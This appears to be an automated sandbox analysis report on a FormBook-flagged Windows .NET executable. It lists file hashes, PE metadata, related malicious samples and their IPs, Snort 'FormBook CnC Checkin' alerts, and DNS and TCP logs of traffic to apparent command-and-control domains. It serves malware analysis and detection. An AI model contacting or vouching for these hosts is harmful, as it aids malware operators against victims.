                                            GDs-#09283 DIAGRAM AND PRODUCT SPECIFICATIONS.pdl.exeGet hashmaliciousBrowse
                                            • 150.95.59.10
                                            s0bi9tGet hashmaliciousBrowse
                                            • 210.157.44.132
                                            Diagram and Specifications.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            soa_02010021.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • 157.7.107.193
                                            94VG.armGet hashmaliciousBrowse
                                            • 157.7.100.11
                                            PO08485.xlsxGet hashmaliciousBrowse
                                            • 118.27.122.218
                                            7UMLyz3hby.exeGet hashmaliciousBrowse
                                            • 150.95.59.9
                                            CLOUDFLARENETUS6TUQ9Lb5rN.exeGet hashmaliciousBrowse
                                            • 172.67.190.175
                                            ezzvG6vQ5l.exeGet hashmaliciousBrowse
                                            • 172.67.195.238
                                            Eh36aKpvNOXJcT8.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            2098765434567890098765.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            0987234567890.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            LENEEsYC55YCboo.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            oytu1F59dV.exeGet hashmaliciousBrowse
                                            • 162.159.134.233
                                            Early_Access.-3878_20211027.xlsbGet hashmaliciousBrowse
                                            • 162.159.134.233
                                            Betalingskvittering.exeGet hashmaliciousBrowse
                                            • 104.21.40.182
                                            Casting Invite.-859403670_20211027.xlsbGet hashmaliciousBrowse
                                            • 162.159.130.233
                                            10272021-AM65Application.HTMGet hashmaliciousBrowse
                                            • 104.18.11.207
                                            x86_64Get hashmaliciousBrowse
                                            • 104.28.249.1
                                            calculadora-trading-criptomonedas-binance-1 (1).apkGet hashmaliciousBrowse
                                            • 172.67.169.191
                                            calculadora-trading-criptomonedas-binance-1 (1).apkGet hashmaliciousBrowse
                                            • 172.67.169.191
                                            Nwszeclpfkywlsrvlpglyrnsilmxebigcs.exeGet hashmaliciousBrowse
                                            • 162.159.133.233
                                            GAWEVQV50254.vbsGet hashmaliciousBrowse
                                            • 104.21.41.22
                                            Hl9GJ6GvUS.exeGet hashmaliciousBrowse
                                            • 162.159.134.233
                                            409876543456789.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            setup_installer.exeGet hashmaliciousBrowse
                                            • 104.21.51.48
                                            Copy Payment 10272021 pdf.exeGet hashmaliciousBrowse
                                            • 104.21.1.146

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CtTYTpaAKA.exe.log
                                            Process:C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.355304211458859
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):6.652354508446339
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:CtTYTpaAKA.exe
                                            File size:512000
                                            MD5:4a640b5abfd52dc70eb962bf9f250714
                                            SHA1:19433ceeaae0f6b678f77e8494a39de9e9d4f870
                                            SHA256:0e636b89393a1581a2e3f4b141c9886bed9c77969569605cdb44b78d94127802
                                            SHA512:36171523a4412146929a73e7d52999a7980f43b576107ae5d4ac65093d49c99eab76acb8527d90b018d92bd15b0c42217810e5f3f3a11bddbc791405deff0c41
                                            SSDEEP:6144:loIQZS4/ZF0145hcJnwO88qariw5fBbP7tJOsDRYG:SIQZhfY8hcinQPpbPxJLDR
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rya..............0.............v.... ........@.. .......................@............@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x47e576
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x617972D2 [Wed Oct 27 15:40:02 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7e5240x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x5ec.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x7c57c0x7c600False0.68001531093data6.66263317517IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x800000x5ec0x600False0.439453125data4.22334624652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x820000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0x800900x35cdata
                                            RT_MANIFEST0x803fc0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightDelchamps 2015
                                            Assembly Version7.3.0.0
                                            InternalNameBinaryArrayTypeEn.exe
                                            FileVersion7.3.0.0
                                            CompanyNameDelchamps
                                            LegalTrademarks
                                            Comments
                                            ProductNamePlatformer_AI
                                            ProductVersion7.3.0.0
                                            FileDescriptionPlatformer_AI
                                            OriginalFilenameBinaryArrayTypeEn.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            10/27/21-19:14:30.605388TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.3203.170.80.253
                                            10/27/21-19:14:30.605388TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.3203.170.80.253
                                            10/27/21-19:14:30.605388TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978980192.168.2.3203.170.80.253
                                            10/27/21-19:14:41.554748TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.3108.167.135.122
                                            10/27/21-19:14:41.554748TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.3108.167.135.122
                                            10/27/21-19:14:41.554748TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.3108.167.135.122
                                            10/27/21-19:15:07.816297TCP1201ATTACK-RESPONSES 403 Forbidden804981934.102.136.180192.168.2.3
                                            10/27/21-19:15:13.056881TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.3116.212.126.191
                                            10/27/21-19:15:13.056881TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.3116.212.126.191
                                            10/27/21-19:15:13.056881TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.3116.212.126.191

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 27, 2021 19:14:12.858870983 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.138322115 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.138437033 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.138565063 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.417850971 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425698996 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425728083 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425744057 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425762892 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425780058 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425795078 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425839901 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.425888062 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.426031113 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.426050901 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.426067114 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.426088095 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.426153898 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.426187992 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.624480009 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.706497908 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.706543922 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.706577063 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.706649065 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.706767082 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.706790924 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.706811905 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.706872940 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.706916094 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.903980017 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.904166937 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:19.023962975 CEST4978680192.168.2.3104.233.161.241
                                            Oct 27, 2021 19:14:19.347073078 CEST8049786104.233.161.241192.168.2.3
                                            Oct 27, 2021 19:14:19.347214937 CEST4978680192.168.2.3104.233.161.241
                                            Oct 27, 2021 19:14:19.347495079 CEST4978680192.168.2.3104.233.161.241
                                            Oct 27, 2021 19:14:19.670664072 CEST8049786104.233.161.241192.168.2.3
                                            Oct 27, 2021 19:14:19.671010017 CEST8049786104.233.161.241192.168.2.3
                                            Oct 27, 2021 19:14:19.671348095 CEST4978680192.168.2.3104.233.161.241
                                            Oct 27, 2021 19:14:19.672274113 CEST8049786104.233.161.241192.168.2.3
                                            Oct 27, 2021 19:14:19.672380924 CEST4978680192.168.2.3104.233.161.241
                                            Oct 27, 2021 19:14:19.993608952 CEST8049786104.233.161.241192.168.2.3
                                            Oct 27, 2021 19:14:24.801487923 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:24.933523893 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:24.933696032 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:24.933825016 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:25.065771103 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:25.242954016 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:25.242989063 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:25.243014097 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:25.243177891 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:25.243274927 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:25.244034052 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:25.244129896 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:25.375250101 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:30.316782951 CEST4978980192.168.2.3203.170.80.253
                                            Oct 27, 2021 19:14:30.605027914 CEST8049789203.170.80.253192.168.2.3
                                            Oct 27, 2021 19:14:30.605206966 CEST4978980192.168.2.3203.170.80.253
                                            Oct 27, 2021 19:14:30.605387926 CEST4978980192.168.2.3203.170.80.253
                                            Oct 27, 2021 19:14:30.894412994 CEST8049789203.170.80.253192.168.2.3
                                            Oct 27, 2021 19:14:30.894438982 CEST8049789203.170.80.253192.168.2.3
                                            Oct 27, 2021 19:14:30.894551992 CEST4978980192.168.2.3203.170.80.253
                                            Oct 27, 2021 19:14:30.894620895 CEST4978980192.168.2.3203.170.80.253
                                            Oct 27, 2021 19:14:31.180448055 CEST8049789203.170.80.253192.168.2.3
                                            Oct 27, 2021 19:14:35.938410997 CEST4981180192.168.2.318.118.119.183
                                            Oct 27, 2021 19:14:36.087071896 CEST804981118.118.119.183192.168.2.3
                                            Oct 27, 2021 19:14:36.087194920 CEST4981180192.168.2.318.118.119.183
                                            Oct 27, 2021 19:14:36.087368965 CEST4981180192.168.2.318.118.119.183
                                            Oct 27, 2021 19:14:36.235853910 CEST804981118.118.119.183192.168.2.3
                                            Oct 27, 2021 19:14:36.235888004 CEST804981118.118.119.183192.168.2.3
                                            Oct 27, 2021 19:14:36.235897064 CEST804981118.118.119.183192.168.2.3
                                            Oct 27, 2021 19:14:36.236080885 CEST4981180192.168.2.318.118.119.183
                                            Oct 27, 2021 19:14:36.236135006 CEST4981180192.168.2.318.118.119.183
                                            Oct 27, 2021 19:14:36.384989977 CEST804981118.118.119.183192.168.2.3
                                            Oct 27, 2021 19:14:41.410120010 CEST4981680192.168.2.3108.167.135.122
                                            Oct 27, 2021 19:14:41.550868988 CEST8049816108.167.135.122192.168.2.3
                                            Oct 27, 2021 19:14:41.554598093 CEST4981680192.168.2.3108.167.135.122
                                            Oct 27, 2021 19:14:41.554748058 CEST4981680192.168.2.3108.167.135.122
                                            Oct 27, 2021 19:14:41.696489096 CEST8049816108.167.135.122192.168.2.3
                                            Oct 27, 2021 19:14:41.696507931 CEST8049816108.167.135.122192.168.2.3
                                            Oct 27, 2021 19:14:41.696680069 CEST4981680192.168.2.3108.167.135.122
                                            Oct 27, 2021 19:14:41.696784973 CEST4981680192.168.2.3108.167.135.122
                                            Oct 27, 2021 19:14:41.837260008 CEST8049816108.167.135.122192.168.2.3
                                            Oct 27, 2021 19:14:51.956742048 CEST4981780192.168.2.3156.240.150.22
                                            Oct 27, 2021 19:14:52.189244032 CEST8049817156.240.150.22192.168.2.3
                                            Oct 27, 2021 19:14:52.189414024 CEST4981780192.168.2.3156.240.150.22
                                            Oct 27, 2021 19:14:52.189634085 CEST4981780192.168.2.3156.240.150.22
                                            Oct 27, 2021 19:14:52.424355030 CEST8049817156.240.150.22192.168.2.3
                                            Oct 27, 2021 19:14:52.424613953 CEST4981780192.168.2.3156.240.150.22
                                            Oct 27, 2021 19:14:52.660298109 CEST8049817156.240.150.22192.168.2.3
                                            Oct 27, 2021 19:14:52.660327911 CEST8049817156.240.150.22192.168.2.3
                                            Oct 27, 2021 19:14:52.660429955 CEST4981780192.168.2.3156.240.150.22
                                            Oct 27, 2021 19:14:57.472357035 CEST4981880192.168.2.3172.67.216.2
                                            Oct 27, 2021 19:14:57.489407063 CEST8049818172.67.216.2192.168.2.3
                                            Oct 27, 2021 19:14:57.489501953 CEST4981880192.168.2.3172.67.216.2
                                            Oct 27, 2021 19:14:57.489799023 CEST4981880192.168.2.3172.67.216.2
                                            Oct 27, 2021 19:14:57.506618977 CEST8049818172.67.216.2192.168.2.3
                                            Oct 27, 2021 19:14:57.515161991 CEST8049818172.67.216.2192.168.2.3
                                            Oct 27, 2021 19:14:57.515211105 CEST8049818172.67.216.2192.168.2.3
                                            Oct 27, 2021 19:14:57.515415907 CEST4981880192.168.2.3172.67.216.2
                                            Oct 27, 2021 19:14:57.515533924 CEST4981880192.168.2.3172.67.216.2
                                            Oct 27, 2021 19:14:57.532366037 CEST8049818172.67.216.2192.168.2.3
                                            Oct 27, 2021 19:15:07.617801905 CEST4981980192.168.2.334.102.136.180
                                            Oct 27, 2021 19:15:07.636635065 CEST804981934.102.136.180192.168.2.3
                                            Oct 27, 2021 19:15:07.637243032 CEST4981980192.168.2.334.102.136.180
                                            Oct 27, 2021 19:15:07.637352943 CEST4981980192.168.2.334.102.136.180
                                            Oct 27, 2021 19:15:07.656073093 CEST804981934.102.136.180192.168.2.3
                                            Oct 27, 2021 19:15:07.816297054 CEST804981934.102.136.180192.168.2.3
                                            Oct 27, 2021 19:15:07.816328049 CEST804981934.102.136.180192.168.2.3
                                            Oct 27, 2021 19:15:07.816468954 CEST4981980192.168.2.334.102.136.180
                                            Oct 27, 2021 19:15:07.816540003 CEST4981980192.168.2.334.102.136.180
                                            Oct 27, 2021 19:15:07.835474014 CEST804981934.102.136.180192.168.2.3

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 27, 2021 19:14:12.577754974 CEST6082353192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:12.846904039 CEST53608238.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:18.644517899 CEST5510253192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:19.019355059 CEST53551028.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:24.676934004 CEST5623653192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:24.800334930 CEST53562368.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:30.284463882 CEST5652753192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:30.315530062 CEST53565278.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:35.913027048 CEST4955953192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:35.937032938 CEST53495598.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:41.296065092 CEST5265053192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:41.403433084 CEST53526508.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:46.738342047 CEST6329753192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:46.759346008 CEST53632978.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:51.773514032 CEST5836153192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:51.955020905 CEST53583618.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:57.447910070 CEST5361553192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:57.469948053 CEST53536158.8.8.8192.168.2.3
                                            Oct 27, 2021 19:15:07.595096111 CEST5072853192.168.2.38.8.8.8
                                            Oct 27, 2021 19:15:07.616633892 CEST53507288.8.8.8192.168.2.3
                                            Oct 27, 2021 19:15:12.819777966 CEST5377753192.168.2.38.8.8.8
                                            Oct 27, 2021 19:15:12.840934992 CEST53537778.8.8.8192.168.2.3
                                            Oct 27, 2021 19:15:18.369975090 CEST5710653192.168.2.38.8.8.8
                                            Oct 27, 2021 19:15:18.393908978 CEST53571068.8.8.8192.168.2.3

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Oct 27, 2021 19:14:12.577754974 CEST192.168.2.38.8.8.80x44dbStandard query (0)www.isshinn1.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:18.644517899 CEST192.168.2.38.8.8.80x40dStandard query (0)www.rdoi.topA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:24.676934004 CEST192.168.2.38.8.8.80xe7e1Standard query (0)www.megacinema.clubA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:30.284463882 CEST192.168.2.38.8.8.80x9895Standard query (0)www.passiverewardssystems.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:35.913027048 CEST192.168.2.38.8.8.80x82d0Standard query (0)www.sosoon.storeA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:41.296065092 CEST192.168.2.38.8.8.80x9466Standard query (0)www.esyscoloradosprings.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:46.738342047 CEST192.168.2.38.8.8.80xff22Standard query (0)www.creationslazzaroni.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:51.773514032 CEST192.168.2.38.8.8.80xacddStandard query (0)www.24000words.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:57.447910070 CEST192.168.2.38.8.8.80xd480Standard query (0)www.healthyweekendtips.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:07.595096111 CEST192.168.2.38.8.8.80x1121Standard query (0)www.thedusi.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:12.819777966 CEST192.168.2.38.8.8.80x87b4Standard query (0)www.mask60.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:18.369975090 CEST192.168.2.38.8.8.80x4685Standard query (0)www.qywyfeo8.xyzA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Oct 27, 2021 19:14:12.846904039 CEST8.8.8.8192.168.2.30x44dbNo error (0)www.isshinn1.com157.7.107.193A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:19.019355059 CEST8.8.8.8192.168.2.30x40dNo error (0)www.rdoi.top104.233.161.241A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:24.800334930 CEST8.8.8.8192.168.2.30xe7e1No error (0)www.megacinema.clubmegacinema.clubCNAME (Canonical name)IN (0x0001)
                                            Oct 27, 2021 19:14:24.800334930 CEST8.8.8.8192.168.2.30xe7e1No error (0)megacinema.club45.93.101.51A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:30.315530062 CEST8.8.8.8192.168.2.30x9895No error (0)www.passiverewardssystems.com203.170.80.253A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:35.937032938 CEST8.8.8.8192.168.2.30x82d0No error (0)www.sosoon.store18.118.119.183A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:41.403433084 CEST8.8.8.8192.168.2.30x9466No error (0)www.esyscoloradosprings.comwebsites076.homestead.comCNAME (Canonical name)IN (0x0001)
                                            Oct 27, 2021 19:14:41.403433084 CEST8.8.8.8192.168.2.30x9466No error (0)websites076.homestead.com108.167.135.122A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:46.759346008 CEST8.8.8.8192.168.2.30xff22Name error (3)www.creationslazzaroni.comnonenoneA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:51.955020905 CEST8.8.8.8192.168.2.30xacddNo error (0)www.24000words.com156.240.150.22A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:57.469948053 CEST8.8.8.8192.168.2.30xd480No error (0)www.healthyweekendtips.com172.67.216.2A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:57.469948053 CEST8.8.8.8192.168.2.30xd480No error (0)www.healthyweekendtips.com104.21.78.41A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:07.616633892 CEST8.8.8.8192.168.2.30x1121No error (0)www.thedusi.comthedusi.comCNAME (Canonical name)IN (0x0001)
